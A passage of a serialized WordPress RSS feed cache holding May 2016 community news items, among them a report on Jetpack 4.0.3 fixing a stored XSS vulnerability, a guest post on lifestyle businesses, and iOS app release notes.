(theme), plugin published</li>\n<li>Plugin directory</li>\n</ul>\n<h3>Links</h3>\n<ul>\n<li><a href=\"https://make.wordpress.org/meta/\">Blog for WordPress.org projects</a></li>\n</ul>\n<h3>Sponsor</h3>\n<p><span>This episode is sponsored by Gravity Forms. <a href=\"http://www.gravityforms.com/\">Gravity Forms</a> makes the best web forms on the planet. Over a million WordPress sites are already using Gravity Forms. Is yours? For more information, check out their <a href=\"http://www.gravityforms.com/\">website</a> and thank you to Gravity Forms for being a Post Status partner. </span><b> </b></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 May 2016 19:18:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: Jetpack 4.0.3 Patches a Critical XSS Vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=55036\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/jetpack-4-0-3-patches-a-critical-xss-vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2266:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/jetpack-logo.gif\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/jetpack-logo.gif?resize=700%2C276\" alt=\"jetpack-logo\" class=\"aligncenter size-full wp-image-27470\" /></a></p>\n<p><a href=\"https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/\" target=\"_blank\">Jetpack 4.0.3 is a security release</a> that contains an important fix for a critical vulnerability that has been present in the plugin since version 2.0, released in 2012. According to Jetpack team member Sam Hotchkiss, a stored XSS vulnerability was found in the way that some Jetpack shortcodes are processed, which allows an attacker to insert JavaScript into comments to hijack a visitor’s browser.</p>\n<p>This particular bug is similar to one <a href=\"https://blog.sucuri.net/2016/05/security-advisory-stored-xss-bbpress-2.html\" target=\"_blank\">recently found and patched in bbPress</a>.</p>\n<p>“Similar issues may exist in other plugins, and it’s a good reminder about the power of regular expressions to create issues when parsing data,” Hotchkiss said.</p>\n<p>The Jetpack team has been working with the WordPress security team to push out point releases for all vulnerable branches of the plugin’s codebase, which includes all versions following 2.0. They are using WordPress’ core automatic update system, so all sites that have not explicitly opted out will receive the security update.</p>\n<p>“Fortunately, we have no evidence of this being used in the wild,” Hotchkiss said. “However, now that this update is public, it’s just a matter of time before someone attempts to exploit it.” The Jetpack team is advising users to update as soon as possible, as the update also fixes any potential exploits that may have already been put in place.</p>\n<p>The team credits Marc-Alexandre Montpas from <a href=\"https://sucuri.net/\" target=\"_blank\">Sucuri</a> for finding the bug and disclosing it responsibly. Users will be notified about the security release via email, but those who have Akismet and/or VaultPress installed have already been protected since the first reporting of the vulnerability.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 May 2016 01:05:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"Post Status: Growing a lifestyle business without losing the lifestyle\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=24644\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://poststatus.com/growing-lifestyle-business/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8760:\"<p><em><strong>Editor’s Note</strong>: This is a guest post by Nate Wright. Nate is a WordPress developer and solopreneur. He runs <a href=\"http://themeofthecrop.com\">Theme of The Crop</a>, a niche WordPress theme company geared toward restaurant websites. You can learn more about Nate on his <a href=\"https://poststatus.com/profiles/nate-wright/\">Post Status profile</a> and follow him on <a href=\"https://twitter.com/natewr\">Twitter</a>.</em></p>\n<hr />\n<p>Here’s a scenario you’re probably familiar with: a friend or family member, not terribly tech-savvy, approaches you with an idea. Why don’t you build Facebook for clowns? What about Uber for sandwiches?</p>\n<p>Their ideas are often a little better than these. Sometimes they’re worse. But in my case the conversation always gets to the same point in the end.</p>\n<p>You can build stuff on the internet. Why aren’t you shooting for the stars? Don’t you want to be rich like Zuckerberg?</p>\n<p>Right now some of you may be thinking: yes I do! This post isn’t for you.</p>\n<p>This is for those of you who cringe at the thought of your days filling up with hiring and training staff, conducting meetings, or filling out paperwork. Those of you who don’t want to live the big siloed life of a CEO. Who dove into the WordPress market because you wanted to build things yourself. For yourself.</p>\n<h3>The rockstars and the rest of us</h3>\n<p>It’s hard to find someone more widely admired among WordPress developers — and more deserving of that admiration — than <a href=\"https://pippinsplugins.com/about/\">Pippin Williamson</a>. So when he <a href=\"https://pippinsplugins.com/control-give-grow/\">described his evolution</a> from staunch go-it-aloner to team leader, many of us sat up and listened.</p>\n<p>The <a href=\"https://pippinsplugins.com/control-give-grow/#comments\">comments</a> in response to that post exhibit a common mix of anxiety, frustration and hope for us go-it-aloners, who have carved out small (and not so small) niches in the WordPress world.</p>\n<p>We’re overstretched and under resourced. We lack good marketing strategies. And we can see that growth will come from transforming our businesses into larger enterprises.</p>\n<p>But then we start thinking about what that means. The hiring. The firing. The training. The meetings. The paperwork. <i>The liability</i>.</p>\n<p>‘I don’t want to be the next Zuckerberg,’ you may think. Then, hopefully, you’ll laugh at the absurdity. But really, you may think, ‘I don’t even want to be the next <a href=\"http://carlhancock.com/\">Carl Hancock</a> or <a href=\"https://yoast.com/author/joost/\">Joost de Valk</a>.’</p>\n<p>Let me be honest with you. I’ll stop putting words in your mouth and put them in mine.</p>\n<p>I have a lifestyle business. No, I don’t sell lifestyle products. I have a business <em>tailored to my lifestyle</em>.</p>\n<p>I have a business that allows to me to take lunch when I want, finish the day when I want, go on holiday when I want, write the code that I want. That’s my job perk. That’s my killer bonus. No, that’s my Shangri-La.</p>\n<p>When people tell you to hire early or scale quickly, they’re right that giving up control can be liberating. But it can also be encumbering. It brings new responsibilities at the same time that it releases you from old ones.</p>\n<p>Whether or not growing your team is right for you will depend on your temperament, your appetite and the kind of lifestyle you want.</p>\n<h3>Being a little fish in a big pond</h3>\n<p>But let’s be honest. You took a chance on the WordPress market because you saw a window of opportunity. That window may be closing.</p>\n<p>In the last few years we’ve seen a lot of consolidation. The theme market exploded, <a href=\"http://inside.envato.com/envato-stories-muhammad-haris-themefusion-2/\">made millions for a few</a>, and then caused a gold rush which <a href=\"http://scottbolinger.com/wordpress-theme-business/\">saturated the market and pushed out small operators</a>.</p>\n<p>At the same time, two big traditional distribution channels dried up: the official <a href=\"https://wordpress.org/themes/\">WordPress.org theme repository</a>, which has a huge backlog of themes awaiting approval, and <a href=\"https://theme.wordpress.com/\">Automattic’s marketplace</a>, which is closed to new entrants.</p>\n<p>We’re also seeing more traditional investment in WordPress properties. The big one is the <a href=\"http://recode.net/2014/05/05/wordpress-parent-automattic-has-raised-160-million-now-valued-at-1-16-billion-post-money/\">$160 million raised by Automattic</a> and Automattic’s subsequent <a href=\"https://poststatus.com/automattic-acquired-woocommerce-woothemes/\">acquisition of WooThemes</a>. Many actors are moving more aggressively to leverage or retain their market position. Syed Balkhi is on a buying and building spree (<a href=\"http://enviragallery.com/about-us/\">1</a>, <a href=\"http://optinmonster.com/about/\">2</a>, <a href=\"https://wpforms.com/say-hello-to-wpforms/\">3</a>, <a href=\"http://wptavern.com/syed-balkhi-acquires-google-analytics-by-yoast-renames-to-monsterinsights\">4</a>). Ninja Forms did a <a href=\"https://ninjaforms.com/releasing-three/\">ground-up rebuild</a>. Pippin’s shedding non-essential products (<a href=\"https://pippinsplugins.com/easy-content-types-acquired/\">1</a>, <a href=\"https://pippinsplugins.com/nikhil-vimal-adopts-front-end-registration-and-login-forms-plugin/\">2</a>) and <a href=\"https://pippinsplugins.com/selfish/\">purging some third-party addons</a>.</p>\n<p>The ecosystem looks increasingly unfriendly to us go-it-aloners. Automattic was the first to go big. Given exclusive commercial access to the WordPress trademark, it carved out its own space and split WordPress down the middle. Now the other half — the WordPress for the rest of us — is going big too.</p>\n<p>The nice thing about being a small operator is that you only need a tiny sliver of the pie. But as the size of the market has grown, it’s become more difficult to attract attention. Showing up with a good product isn’t enough.</p>\n<h3>Going it alone, together</h3>\n<p>My lifestyle business is working well for me. Revenue keeps inching up. Slowly.</p>\n<p>But it might not make it in a different kind of WordPress space. I’ve been thinking a lot about that lately. And I bet you have too.</p>\n<p>Where’s the market going? What am I willing to trade to survive? Which headaches are <a href=\"http://www.codeinwp.com/blog/transparency-report-14/\">worth changing direction for</a> and which headaches aren’t?</p>\n<p>Here are some of the ideas I’ve been tossing around:</p>\n<h3>Contractors</h3>\n<p>Hiring out. I could scale up or down easily, depending on how well it goes. But it’s tough to manage quality when juggling vendors.</p>\n<p>And what would I contract? I’d like to shed my bumbling efforts in marketing and traffic generation. But that seems like precisely the kind of job full of jackals who don’t know what they’re doing.</p>\n<p>Ok, that’s harsh. I’ll just say: I worry it’d be a headache to manage it well.</p>\n<p>Theme development seems the most plausible, since there’s a large body of talented, hungry themers washing up from the stormy seas of ThemeForest. But it may be the least valuable since the market is being swallowed up by a few big themes.</p>\n<h3>Commissions</h3>\n<p>Affiliate marketing is already working for me. A little. I could go further and recruit theme or plugin developers to sell from my site on commission.</p>\n<p>Then I’m saddled with support for products I didn’t build. Can I maintain quality? Can I drive enough traffic to be an attractive outlet for them? Will I end up with all of the headaches I wanted to avoid?</p>\n<h3>Partnerships</h3>\n<p>Maybe I’ll trade in my king-of-the-hill cap and bring on partners. Not employees. Genuine partners with overlapping skill sets. Instead of being a go-it-aloner we can be two or three go-it-aloners going it alone together!</p>\n<p>Or maybe that’s just a terrible way to run a business.</p>\n<h3>Alliances</h3>\n<p>There are a lot of us out there. Independent themers looking to expand beyond ThemeForest or give up on the old freemium approach of the official repository. Plugin developers looking for a new home or seeking out themes that will integrate with their plugins.</p>\n<p>We could probably do something special if we made stronger alliances. Combined to build to stronger platforms for our products.</p>\n<p>But that sounds like a lot of project management. Isn’t that what we were hoping to avoid?</p>\n<p>I don’t know. I’m going to go write some code.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 26 May 2016 18:10:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Nate Wright\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"WP Mobile Apps: WordPress for iOS: Version 6.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://apps.wordpress.com/?p=3416\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://apps.wordpress.com/2016/05/25/wordpress-for-ios-version-6-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3021:\"<p>Hi there, WordPress users! <a href=\"https://itunes.apple.com/us/app/wordpress/id335703880?mt=8&uo=6&at=&ct=\">Version 6.2 of the WordPress for iOS app</a> is now available in the App Store.</p>\n<h1>What’s New:</h1>\n<p><strong>Sharing just got easier!</strong> Post content from apps to your WordPress.com site with a new Share extension. Also, share a post right from your editor’s preview screen.</p>\n\n<a href=\"https://apps.wordpress.com/img_2229_2/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/05/img_2229_2.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"IMG_2229_2\" /></a>\n<a href=\"https://apps.wordpress.com/img_2230/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/05/img_2230.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"IMG_2230\" /></a>\n\n<p><strong>Improved clipboard support: </strong>Working with images? You can now copy and paste single images in your editor.</p>\n<p><strong>Login with ease:</strong> We improved error messages for self-hosted users.</p>\n<p><strong>Enhancements:</strong> Because “good” is not enough! Here’s the full <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?q=is%3Aclosed+is%3Aissue+milestone%3A6.2+label%3A%22%5BType%5D+Enhancement%22\">list of enhancements</a>.</p>\n<p><strong>Bugs, be gone!</strong> We zapped bugs that prevented images from rendering properly and caused backspaces to misbehave. You can see the full list of bug fixes <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?q=is%3Aclosed+is%3Aissue+milestone%3A6.1+label%3A%22%5BType%5D+Bug%22\">here</a>!</p>\n<h1>Thank You</h1>\n<p>Thanks to all of the contributors who worked on this release:<br />\n<a href=\"https://github.com/aerych\">@aerych</a>, <a href=\"https://github.com/akirk\">@akirk</a>, <a href=\"https://github.com/alexcurylo\">@alexcurylo</a>, <a href=\"https://github.com/astralbodies\">@astralbodies</a>, <a href=\"https://github.com/diegoreymendez\">@diegoreymendez</a>, <a href=\"https://github.com/frosty\">@frosty</a>, <a href=\"https://github.com/jleandroperez\">@jleandroperez</a>, <a href=\"https://github.com/koke\">@koke</a>, <a href=\"https://github.com/kurzee\">@kurzee</a>, <a href=\"https://github.com/kwonye\">@kwonye</a>, <a href=\"https://github.com/maxme\">@maxme</a>, <a href=\"https://github.com/nheagy\">@nheagy</a>, <a href=\"https://github.com/rachelmcr\">@rachelmcr</a>, <a href=\"https://github.com/sendhil\">@sendhil</a>, <a href=\"https://github.com/mattmiklic\">@mattmiklic</a> and <a href=\"https://github.com/SergioEstevao\">@SergioEstevao</a>.</p>\n<p>You can track the development progress for the next update by visiting <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?utf8=✓&q=is%3Aissue+milestone%3A6.3+\" target=\"_blank\">our 6.3 milestone on GitHub</a>. Until next time!</p><img alt=\"\" border=\"0\" src=\"https://pixel.wp.com/b.gif?host=apps.wordpress.com&blog=108068616&post=3416&subd=apps&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 25 May 2016 06:05:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"diegoreymendez\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"WPTavern: In Case You Missed It – Issue 9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=55015&preview_id=55015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://wptavern.com/in-case-you-missed-it-issue-9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8011:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/01/ICYMIFeaturedImage.png\" rel=\"attachment wp-att-50955\"><img class=\"size-full wp-image-50955\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/01/ICYMIFeaturedImage.png?resize=676%2C292\" alt=\"In Case You Missed It Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/112901923@N07/16153818039\">Night Moves</a> – <a href=\"https://creativecommons.org/licenses/by-nc/2.0/\">(license)</a>\n<p>There’s a lot of great WordPress content published in the community but not all of it is featured on the Tavern. This post is an assortment of items related to WordPress that caught my eye but didn’t make it into a full post.</p>\n<h2>Chris Lema Launches Beyond Good</h2>\n<p>Chris Lema has launched a new site called <a href=\"http://beyondgood.com/\">Beyond Good </a>that provides insight, tips, and methodologies for leading employees to become better than good. If it’s anything like his other sites, it’s sure to be a hit in the WordPress community.</p>\n<h2>Remote Jobs, a Remote Worker Specific Jobs Board</h2>\n<p>Chris Wallace and the team at Lift have launched <a href=\"https://remotejobs.com/\">Remote Jobs</a>, a jobs board specifically catered to remote workers. According to Wallace, “The site exists to help others find remote jobs that connect them with their passions in life.” Check out the site as there’s already a decent listing of opportunities available for remote workers.</p>\n<h2>Why .Blog is Worth $19M</h2>\n<p>Matt Mullenweg participated in a <a href=\"http://venturebeat.com/2016/05/12/the-creator-of-wordpress-on-why-blog-was-worth-19-million/\">phone interview with VentureBeat</a>. The first question in the interview asks why the .blog domain is worth $19M.</p>\n<blockquote><p>Well, the domain business is actually a really good business because you can sell a domain and people use it and keep it forever. So, if you look at like a Verisign, or people who have TLDs, it’s actually an incredible business.</p>\n<p>We really wanted .blog to be open, and some of the other applications for .blog were closed, including Google — so, let’s say for example, only Blogger could have a .blog domain. And we thought that .blog should be open to everyone, even if they’re not using WordPress.</p>\n<p>I gotta be honest though, it was a stressful auction.</p></blockquote>\n<p>There are other tidbits of information included in the interview that I highly encourage you to read. If I were Google, I’d be upset as .blog is the perfect complimentary domain for Blogger.</p>\n<h2>Drupal Association Gives Community Member a Lifetime Ban</h2>\n<p>DrupalCon New Orleans took place last week and during the event, several speakers <a href=\"https://www.drupal.org/node/2729687\">experienced online harassment</a> in the form of derogatory racist, homophobic, and misogynistic comments and images from an anonymous Twitter account. Upon further investigation by community members and the Drupal Association technical and event staff, the harassment was tracked to an attendee at the event.</p>\n<blockquote><p>This person was then confronted by members of the Drupal Association staff and the Community Working Group. They were asked to leave the event and informed that they have been banned from attending any future DrupalCons as well as any events produced by the Drupal Association, in accordance with the <a href=\"https://events.drupal.org/neworleans2016/code-conduct\" rel=\"nofollow\">DrupalCon Code of Conduct</a>, which states, ‘We do not tolerate harassment of conference participants in any form.’ Shortly after the person left the conference, the account from which the harassing tweets were made was deleted.</p></blockquote>\n<p>This is an excellent example of why Codes of Conduct exist for events. By the way, check out the <a href=\"https://plan.wordcamp.org/code-of-conduct/\">Code of Conduct</a> that’s in place for every WordCamp. If you experience harassment of any kind at a WordCamp, please tell event staff.</p>\n<h2>Plans Published to Upgrade WordPress Support Forums</h2>\n<p>Jennifer Dodd published a <a href=\"https://make.wordpress.org/meta/2016/05/19/wordpress-org-forums-upgrade/\">detailed plan</a> for migrating the WordPress.org support forums from bbPress 1.x to 2.x. The project is a huge undertaking and involves moving massive amounts of data. If all goes according to plan, the support forums will be on bbPress 2.x by the end of the year. I’m sure a lot of support forum volunteers are stoked to hear this news.</p>\n<h2>What NOT to Name a WordPress Theme</h2>\n<p>This tweet by Ryan Sullivan gave me a good laugh.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">I\'d strongly consider rebranding. <a href=\"https://t.co/9MeevJTlPq\">pic.twitter.com/9MeevJTlPq</a></p>\n<p>— Ryan D. Sullivan (@ryandonsullivan) <a href=\"https://twitter.com/ryandonsullivan/status/733120690816065536\">May 19, 2016</a></p></blockquote>\n<p></p>\n<h2>Tom McFarlin on Improving the WordPress Plugin UX</h2>\n<p>Tom McFarlin published a <a href=\"https://tommcfarlin.com/wordpress-plugin-user-experience-2/\">great article</a> that offers ideas on how plugin developers can improve the WordPress plugin user experience. His first suggestion is a key reason I think GravityForms became successful.</p>\n<blockquote><p>Try to make sure that your project tightly integrates with the core WordPress user interface.</p></blockquote>\n<p>When I witnessed GravityForms for the first time in 2009, I loved how it integrated into the WordPress backend as if it were a part of the core software. Fast forward to 2016 and plugins that tie into a service are experimenting with overlay interfaces that replace WordPress’. The most recent example I recall is WP Forms <a href=\"http://wptavern.com/wpforms-aims-to-be-the-most-beginner-friendly-forms-plugin-for-wordpress\">that I reviewed</a> earlier this year.</p>\n<p>In my review, I specifically noted that the interface the developers used allowed me to focus on creating forms. It doesn’t seem like it’s a WordPress core feature and it didn’t have too. While the advice McFarlin gives is likely accurate for most cases, there are plugins that benefit from having a unique user interface different from WordPress’.</p>\n<h2>Don’t Edit Core</h2>\n<p>This comic <a href=\"http://www.commitstrip.com/en/2016/05/17/coder-dilemma-9-the-upgrade/\">created by CommitStrip</a> made me smile.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Coder Dilemma #9 – The Upgrade<br /> <a href=\"https://t.co/2Tu2l1tgYX\">https://t.co/2Tu2l1tgYX</a> <a href=\"https://t.co/xnMr2VdYWv\">pic.twitter.com/xnMr2VdYWv</a></p>\n<p>— CommitStrip (@CommitStrip) <a href=\"https://twitter.com/CommitStrip/status/732505464768843776\">May 17, 2016</a></p></blockquote>\n<p></p>\n<h2>Wapuu Tattoo!</h2>\n<p>In what is a traditional part of this series, I end each issue by featuring a Wapuu design. For those who don’t know, Wapuu is the <a href=\"http://wapuu.jp/2015/12/12/wapuu-origins/\">unofficial mascot</a> of the WordPress project. WordCamp St. Louis 2016, took place last weekend and one of the attendees had a Wapuu tattoo! Wapuu looks good everywhere, including human skin!</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Wapuu has been sighted at <a href=\"https://twitter.com/hashtag/wcstl?src=hash\">#wcstl</a> <a href=\"https://twitter.com/hashtag/wordpress?src=hash\">#wordpress</a> <a href=\"https://twitter.com/hashtag/wapuu?src=hash\">#wapuu</a> <a href=\"https://t.co/4HYlp6GI0S\">pic.twitter.com/4HYlp6GI0S</a></p>\n<p>— Nile Flores (@blondishnet) <a href=\"https://twitter.com/blondishnet/status/731504592668758017\">May 14, 2016</a></p></blockquote>\n<p></p>\n<p>That’s it for issue nine. If you recently discovered a cool resource or post related to WordPress, please share it with us in the comments.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 May 2016 22:30:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: WordPress Meta Team Publishes Prototypes of The Plugin Directory Redesign\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=55006\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/wordpress-meta-team-publishes-prototypes-of-the-plugin-directory-redesign\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3713:\"<p>In early 2015, the WordPress.org Meta team <a href=\"http://wptavern.com/wordpress-plugin-directory-launches-new-design\">redesigned</a> the <a href=\"https://wordpress.org/plugins/\">WordPress plugin directory</a> and added a number of new features. In an effort to iterate on the page’s layout, the Meta Team has <a href=\"https://make.wordpress.org/meta/2016/05/19/plugin-directory-prototypes/\">published prototypes</a> of a new design for the <a href=\"http://codepen.io/mapk/full/jqxqbo/\">plugin directory’s home</a> and <a href=\"http://codepen.io/mapk/full/KzGQKv/\">search results pages</a>.</p>\n<p>The prototypes are inspired by <a href=\"https://get.wp.com/\">Get WordPress</a>, a landing page that provides key information about the WordPress project at a glance.</p>\n<p>There are a few things to keep in mind while looking at these prototypes. The first is that plugin information displayed on the page is inaccurate. Second, the Pro and Light classifications are for design purposes only. Third, links at the bottom will point to their corresponding pages.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/PluginDirectoryMockup1.png\"><img class=\"size-full wp-image-55007\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/PluginDirectoryMockup1.png?resize=1025%2C2753\" alt=\"WordPress Plugin Directory Homepage Protoype\" /></a>WordPress Plugin Directory Homepage Protoype\n<p>Unlike the current design, the prototype displays far less information. Authors, Last Updated, Compatibility, and Active Installs are absent from the homepage view. Initial feedback <a 